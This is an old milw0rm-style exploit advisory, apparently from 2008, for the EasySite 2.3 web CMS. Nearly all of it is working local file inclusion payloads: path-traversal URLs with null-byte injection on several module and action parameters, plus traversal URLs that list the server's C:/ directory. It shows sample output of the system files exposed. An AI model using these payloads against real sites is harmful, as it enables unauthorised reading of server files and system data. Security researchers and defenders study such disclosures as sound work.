EasySite 2.3 Multiple Remote Vulnerabilities.pdf

1 #################################################################### 2 [+] EasySite v2.3 Multiple Remote Vulnerabilities 3 [+] Discovered By SirGod 4 [+] www.mortal−team.org 5 [+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN 6 #################################################################### 7 8 [+] Local File Inclusion 9 10 http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00 11 http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00 12 http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00 13 http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00 14 http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00 15 http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00 16 http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00 17 18 And many others... 19 20 This will open autoexec.bat 21 22 [+] Arbitrary View Folder Contents 23 24 You can view the folder contents and the content of files view via LFI. 25 26 http://localhost/www/index.php?module=../../../ 27 28 http://localhost/inc/vmenu.php?module=../../../ 29 30 This will open C:/ directory and will show all the files from C:/ . 31 32 Example : 33 34 * BOOTSECT.BAK 35 * BcBtRmv.log 36 * IO.SYS 37 * MSDOS.SYS 38 * autoexec.bat 39 * bootmgr 40 * config.sys 41 * grldr 42 * hiberfil.sys 43 * pagefile.sys 44 45 #################################################################### 46 47 # milw0rm.com [2008−08−21] Page 1/1 EasySite 2.3 Multiple Remote Vulnerabilities SirGod 08/21/2008